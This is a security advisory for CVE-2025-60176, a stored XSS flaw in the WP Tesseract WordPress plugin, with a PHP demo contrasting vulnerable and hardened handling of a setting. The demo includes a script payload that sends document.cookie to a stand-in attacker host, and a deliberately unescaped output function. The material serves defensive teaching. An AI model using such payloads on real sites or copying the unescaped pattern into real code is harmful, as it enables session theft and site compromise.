CVE-2025-60176 MEDIUM

CVE-2025-60176: WordPress WP Tesseract Plugin <= 1.0.2 - Cross Site Scripting (XSS) Vulnerability

Vendor Tattersoftware
Product WP Tesseract
Weakness CWE-79 · XSS
Published October 22, 2025
Last update April 28, 2026

CVSS base score

5.9/10
Attack vector Network
Attack complexity Low
Privileges required High
User interaction Required
Scope Changed
Confidentiality Low
Integrity Low
Availability Low

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

What the vulnerability does

01Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in tattersoftware WP Tesseract wp-tesseract allows Stored XSS. This issue affects WP Tesseract: from n/a through 1.0.2.

Explanation of Vulnerability in Simple Terms

02Summary

WP Tesseract versions 1.0.2 and earlier contain a stored cross-site scripting (XSS) vulnerability: input supplied through the plugin by a user holding a high-privilege account (PR:H in the CVSS vector, typically an administrator) is saved and later written back into a page without adequate escaping. The stored script then runs in the browser of any user who views the page where that value is rendered; for a stored XSS the UI:R metric is the victim loading that page, not clicking a crafted link, and the script executes in the victim's browser rather than inside the plugin's own security boundary, which is why the vector carries S:C. Depending on who views the page, this can lead to session or data theft, unauthorized actions performed with the victim's privileges, or further compromise of the WordPress site.
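The CWE-79 shape behind this advisory, shown as an added example that is not WP Tesseract's code: a plugin setting is stored verbatim and echoed verbatim (vulnerable), beside the same setting sanitised on save and escaped at output (hardened). The option name `tess_demo_label`, the form field, the markup and the `attacker.example` host are assumptions made for illustration, and the payload is constructed test input. The WordPress functions it calls (`update_option`, `get_option`, `esc_html`, `esc_attr`, `sanitize_text_field`) are real WordPress APIs; they are shimmed behind `function_exists()` guards with their documented behaviour so the file runs under plain `php` without a WordPress install.

```php
<?php
// Added example for CVE-2025-60176 (CWE-79, stored XSS in a WordPress plugin).
// Not WP Tesseract's code: option name, field name, markup and payload are assumptions.
// The WordPress functions below are shimmed so `php stored_xss_demo.php` works stand-alone;
// inside WordPress the real implementations win because of the function_exists() guards.

$GLOBALS['demo_options'] = [];                          // stand-in for the wp_options table

if (!function_exists('update_option')) {
    function update_option($name, $value) { $GLOBALS['demo_options'][$name] = $value; return true; }
}
if (!function_exists('get_option')) {
    function get_option($name, $default = false) { return $GLOBALS['demo_options'][$name] ?? $default; }
}
if (!function_exists('esc_html')) {                     // WP: encodes < > & " ' for text-node context
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('esc_attr')) {                     // WP: same encoding, for attribute-value context
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('sanitize_text_field')) {          // approximation: WP also normalises whitespace and octets
    function sanitize_text_field($str) { return trim(strip_tags((string) $str)); }
}

// --- Vulnerable shape: the value is stored as submitted and echoed as stored.
// The high-privilege requirement (PR:H) comes from who may reach the settings form;
// nothing neutralises the value, so it runs for everyone who views the rendered page.
function vuln_save_label(array $post): void {
    update_option('tess_demo_label', $post['tess_demo_label'] ?? '');
}
function vuln_render_label(): string {
    return '<label>' . get_option('tess_demo_label', '') . '</label>';
}

// --- Hardened shape: sanitise on save (defence in depth) and escape at output with the
// escaper matching the HTML context. Output escaping is the decisive fix: on single-site
// WordPress an administrator holds `unfiltered_html`, so input-side filtering alone cannot
// be relied on for that role.
function safe_save_label(array $post): void {
    update_option('tess_demo_label', sanitize_text_field($post['tess_demo_label'] ?? ''));
}
function safe_render_label(): string {
    $label = get_option('tess_demo_label', '');
    return '<label title="' . esc_attr($label) . '">' . esc_html($label) . '</label>';
}

// Demo check only (not a sanitiser): does the fragment still carry an unescaped <script tag?
function contains_live_script(string $html): bool {
    return (bool) preg_match('/<script\b/i', $html);
}

// Constructed attacker input: closes the attribute/tag it lands in, then exfiltrates cookies.
$payload = '"><script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

vuln_save_label(['tess_demo_label' => $payload]);
$live = vuln_render_label();
printf("vulnerable : %s\n  live script? %s\n", $live, contains_live_script($live) ? 'yes' : 'no');

safe_save_label(['tess_demo_label' => $payload]);
$fixed = safe_render_label();
printf("hardened   : %s\n  live script? %s\n", $fixed, contains_live_script($fixed) ? 'yes' : 'no');

// A value written before the fix (or by a path that skips sanitisation) is still neutralised,
// because escaping happens at the point where the value meets the page.
vuln_save_label(['tess_demo_label' => $payload]);
$legacy = safe_render_label();
printf("legacy data: %s\n  live script? %s\n", $legacy, contains_live_script($legacy) ? 'yes' : 'no');
```

The three runs print "yes", "no", "no" for the live-script check. The third case is the one that matters for remediation of an already-exploited site: stripping or filtering at save time does nothing for payloads that are already in the database, whereas escaping at render time covers them. The escaper must match the context the value lands in: `esc_html()` for text nodes, `esc_attr()` inside attributes, `esc_url()` for `href`/`src`, and `wp_kses_post()` only where a limited HTML subset is deliberately allowed.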

What an attacker can do

03Attacker Capabilities

Inject malicious JavaScript that executes in other users' browsers when they visit the site.

Potential impact on your site

04Site Impact

A malicious or compromised high-privilege account can plant a script that runs for every user who views the affected page, including other administrators, enabling session or data theft, actions taken silently with the victim's privileges, redirects, or malware distribution.

Conditions required to exploit

05Prerequisites

The attacker needs an account with high privileges on the site (PR:H; typically administrator), and a victim must view the page where the stored, unescaped value is rendered (UI:R). No crafted link is required for a stored XSS; the payload is served by the site itself. Note that on single-site WordPress, administrators and editors already hold the unfiltered_html capability and can publish arbitrary markup, so the practical exposure is greatest on Multisite installs and on sites that define DISALLOW_UNFILTERED_HTML, where that capability is withheld.

Key dates

06Disclosure timeline

October 22, 2025 CVE published
April 28, 2026 Record updated